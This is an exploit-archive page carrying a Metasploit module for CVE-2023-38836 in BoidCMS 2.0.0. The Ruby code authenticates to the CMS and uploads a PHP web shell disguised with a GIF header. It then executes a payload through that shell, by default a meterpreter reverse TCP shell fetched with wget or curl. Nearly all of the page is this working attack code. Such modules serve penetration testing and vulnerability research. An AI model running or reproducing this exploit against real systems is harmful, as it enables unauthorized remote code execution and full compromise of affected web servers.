exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

BoidCMS 2.0.0 Command Injection

BoidCMS 2.0.0 Command Injection
Posted Mar 1, 2024
Authored by bwatters-r7, 1337kid | Site metasploit.com

This Metasploit module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS versions 2.0.0 and below. BoidCMS allows the authenticated upload of a php file as media if the file has the GIF header, even if the file is a php file.

tags | exploit, php
advisories | CVE-2023-38836
SHA-256 | 4be34ec34fdd2c459e03d46cbe61a319a411480ce0b82004ab5d83d8fcc669d1

BoidCMS 2.0.0 Command Injection

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
prepend Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'BoidCMS Command Injection',
'Description' => %q{
This module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS version 2.0.0
and below. BoidCMS allows the authenticated upload of a php file as media if the file has
the GIF header, even if the file is a php file.
},
'License' => MSF_LICENSE,
'Author' => [
'1337kid', # Discovery
'bwatters-r7' # Metasploit Module
],
'References' => [
[ 'CVE', '2023-38836' ],
[ 'URL', 'https://github.com/1337kid/CVE-2023-38836']
],
'Privileged' => false,
'Arch' => ARCH_CMD,
'Targets' => [
[
'nix Command',
{
'Platform' => ['linux', 'unix', 'python'],
'DefaultOptions' => {
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
'FETCH_COMMAND' => 'WGET',
'FETCH_WRITABLE_DIR' => '/tmp'
}
}
],
[
'Windows Command',
{
'Platform' => ['windows', 'python'],
'DefaultOptions' => {
'PAYLOAD' => 'cmd/windows/http/x64/meterpreter_reverse_tcp',
'FETCH_WRITABLE_DIR' => '%TEMP%',
'FETCH_COMMAND' => 'CURL'
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2023-07-13',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)

register_options([
OptString.new('TARGETURI', [true, 'The path', '']),
OptString.new('CMS_USERNAME', [true, 'Username', 'admin']),
OptString.new('CMS_PASSWORD', [true, 'Password', 'password']),
OptString.new('PHP_FILENAME', [true, 'The name for the php file to upload', "#{Rex::Text.rand_text_alphanumeric(5..11)}.php"])

])
@token = nil
@shell_filename = nil
end

def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin'),
'keep_cookies' => true,
'method' => 'GET'
)
if res && res.code == 200
title = res.get_html_document.xpath('//title').first.to_s
return Exploit::CheckCode::Detected('Detected BoidCMS, but the version is unknown.') if title.include?('BoidCMS')
end
return Exploit::CheckCode::Safe('Unable to retrieve BoidCMS title page')
end

def extract_token(res)
token = nil
if res && res.code == 200
token = res.get_html_document.xpath("//input[@name='token']/@value").first
end
token
end

def cms_token
# initial login
return @token unless @token.nil?

vprint_status('Getting Token')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin'),
'keep_cookies' => true,
'method' => 'GET'
)
@token = extract_token(res)
end

def cms_login?(login_token)
vprint_status('Logging into CMS')
cms_password = datastore['CMS_PASSWORD']
cms_username = datastore['CMS_USERNAME']
vars_form_data =
[
{
'name' => 'username',
'data' => cms_username
},
{
'name' => 'password',
'data' => cms_password
},
{
'name' => 'login',
'data' => 'Login'
},
{
'name' => 'token',
'data' => login_token.to_s
}
]
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin'),
'method' => 'POST',
'keep_cookies' => true,
'vars_form_data' => vars_form_data
)
res && res.code == 302
end

def upload_php?(login_token, shell_filename)
vprint_status("Uploading PHP file #{shell_filename}")
vars_form_data =
[
{
'name' => 'file',
'data' => 'GIF89a;\n<?php system($_GET["cmd"]) ?>',
'filename' => shell_filename
},
{
'name' => 'token',
'data' => login_token.to_s
},
{
'name' => 'upload',
'data' => 'Upload'
}
]

res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin'),
'method' => 'POST',
'keep_cookies' => true,
'vars_get' => {
'page' => 'media'
},
'vars_form_data' => vars_form_data
)
res && res.code == 302
end

def launch_payload(shell_filename, payload_cmd)
# send the command to the php page
vprint_status('launching Payload')
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/media/#{shell_filename}"),
'method' => 'GET',
'keep_cookies' => true,
'vars_get' =>
{
'cmd' => payload_cmd
}
)
end

def exploit
@shell_filename = datastore['PHP_FILENAME']
login_token = cms_token

fail_with(Failure::UnexpectedReply, 'Failed to retrieve token for login') if login_token.nil?
fail_with(Failure::UnexpectedReply, 'Failed to log in') unless cms_login?(login_token)
if upload_php?(login_token, @shell_filename)
register_file_for_cleanup @shell_filename
launch_payload(@shell_filename, payload.encoded)
else
fail_with(Failure::UnexpectedReply, 'Failed to upload php files')
end
end

end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close